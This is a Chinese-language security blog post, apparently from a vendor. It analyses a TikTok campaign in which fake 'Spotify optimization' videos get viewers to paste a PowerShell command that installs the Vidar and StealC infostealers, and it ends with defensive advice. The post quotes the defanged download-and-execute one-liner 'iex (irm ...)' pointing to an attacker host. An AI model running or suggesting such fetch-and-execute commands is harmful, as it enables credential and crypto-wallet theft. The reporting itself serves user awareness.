【TikTok驚見Spotify優化陷阱】：解析PowerShell指令如何散佈Vidar與StealC竊密程式

　　TikTok熱門影片竟成駭客溫床！近期發現駭客利用@gitallowed帳號發布「優化 Spotify體驗」教學，誘騙用戶透過 PowerShell 執行惡意指令。該攻擊利用AI生成語音降低戒心，引導使用者輸入 iex (irm ...)指令，實則下載並植入Vidar與StealC竊密軟體。這些病毒能遠端竊取加密貨幣錢包、信用卡資訊並進行螢幕截圖。

　　本文深度解析駭客如何利用隱藏目錄與登錄項建立持久化攻擊，並提供防範社群媒體惡意連結的安全建議，提醒使用者切勿執行來路不明的指令，避免資安防護毀於一旦。

　　你有沒有這種經驗？原本只是想放鬆個幾分鐘，結果手機拿起來，就開始滑短影片，笑一個、點一個、再看一個，時間就像被瞬間消失一樣，一下子就不見了。這種「被吸進影片漩渦」的感覺，相信大家都不陌生。而這個讓大家沉迷的罪魁禍首，正是現在超熱門的短影音平台，TikTok。

　　TikTok為什麼這麼讓人上癮？原因其實很簡單：它太懂人了。演算法會根據你停留的時間、按讚、留言、分享的習慣，自動抓出你喜歡的內容。看了兩支美食，它就知道你肚子餓；看了三支旅遊，它馬上幫你安排下一趟「視覺旅行」。不用搜尋、不用思考，滑一下就有新鮮內容跑出來，誰能抵擋這種誘惑？

　　而且TikTok的影片短、節奏快，十幾秒就能把重點塞滿，既不佔時間，又能帶來滿滿娛樂感。很多特效、濾鏡、配樂也非常洗腦，讓影片看起來更有趣。有時候你甚至會覺得，TikTok 比朋友還更了解你的幽默感。難怪大家越滑越離不開。

　　不過，越紅的平台，越容易成為駭客的目標。以下來說明一起駭客利用 TikTok 散佈惡意程式的案例。

駭客在社群媒體TikTok發佈可以優化APP的執行指令影片

　　在網路上發現一名TikTok用戶@gitallowed發布了一段聲稱提供「如何立即提升 Spotify 體驗」的影片，影片的內容是說明如何提升Spotify 體驗並引導使用者安裝優化使用體驗的程式。影片中引導安裝的語音與作者其他部影片與語音極為相似，僅操作指令或URL連結內容不同，極有可能為人工智慧快速生成的內容，根據TikTok的數據分析，觀看數接近50萬，點讚數超過2萬，評論超過100則，顯示影片的觸及率驚人。

駭客所製作如何立即提升 Spotify 體驗的教學影片

被害者在不知情的情況下依照影片內容引導安裝惡意軟體

駭客影片內容主要就是引導安裝以下三個步驟：

1. 按下 Windows + R 鍵，開啟執行視窗。

2. 輸入powershell並按 Enter 鍵，透過執行視窗開啟powershell。

3. 執行命令： iex (irm hxxps://allaivo[.]me/spotify)，在powershell安裝hxxps://allaivo[.]me/spotify下載的內容。

在執行命令裡的URL裡含有spotify的字串，讓使用者很容易降低戒心，認為真的是在下載並安裝提升 Spotify 體驗的優化程式。但實際上卻是從hxxps://allaivo[.]me/spotify網址下載powershell腳本後安裝惡意程式。

下載安裝惡意軟體的powershell腳本片段

　　在解析powerShell腳本後發現，腳本會先在APPDATA 或 LOCALAPPDATA 資料夾中建立隱藏目錄，並執行 ”updater.exe” 下載檔案及安裝Vidar或StealC惡意軟體。完成後會再下載並執行另一個powershell腳本”WindowsUpdate.ps1” 來建立登錄項目，以便在啟動時執行腳本。最後，執行完以上程序後腳本會刪除臨時資料夾，抹去整個惡意攻擊的痕跡，增加取證困難度，非常狡猾。

　　Vidar和StealC都是惡名昭彰的竊取資料惡意軟體，一旦被成功植入，設備上的很多重要資料(加密貨幣錢包帳密、信用卡資訊、網銀帳密..等)，都有可能被竊取並傳回駭客的伺服器。甚至在竊取資料時進行screenshot將實際桌面上的內容回傳伺服器，獲取更多的資訊。假設駭客在screenshot有看到開著交易所或是加密錢包的畫面，就有可能會在針對這些資訊做第二次的攻擊，讓人防不勝防。

         駭客利用TikTok宣傳優化APP功能，進行惡意攻擊流程

流程圖：

防範社群媒體散佈影片惡意攻擊建議

　　● 不要輕易相信社群媒體上免費的教學資源，例如：如何破解軟體的付費權限、如何提高軟體效能、解鎖隱藏功能..等。這些動作往往都會要求在系統上複製一些”指令”執行，但實際上執行了那些內容，我們根本不得而知，如果包含惡意程式，那我們就親手將自己推入深淵。

　　● 一律使用原廠(版)的資源，軟體需要更新或是優化，請先確認來源，如果是原廠的再執行，出了問題還有資源可以協助。來路不明的軟體，不清楚實際執行的內容，出問題也找不到任何資源可以協助。

　　● 建立良好習慣，如果真有需要複製指令執行，請先了解或是查詢這段指令的用途，現在網路資源很發達，很快就可以查到資訊，不要別人提供指令就直接貼上執行非常的危險。

●      　　● 定期員工資安訓練或外部請資安專家安排訓練課程，讓員工學習辨識更多的惡意攻擊手法。

　　想了解更多產品資訊，請連至官網https://www.neithnet.com/zh/，或直接與NEITHNET資安專家聯繫：info@neithnet.com

參考資料：

1.      https://www.bleepingcomputer.com/news/security/tiktok-videos-now-push-infostealer-malware-in-clickfix-attacks/

2.      https://www.trendmicro.com/en_us/research/25/e/tiktok-videos-infostealers.html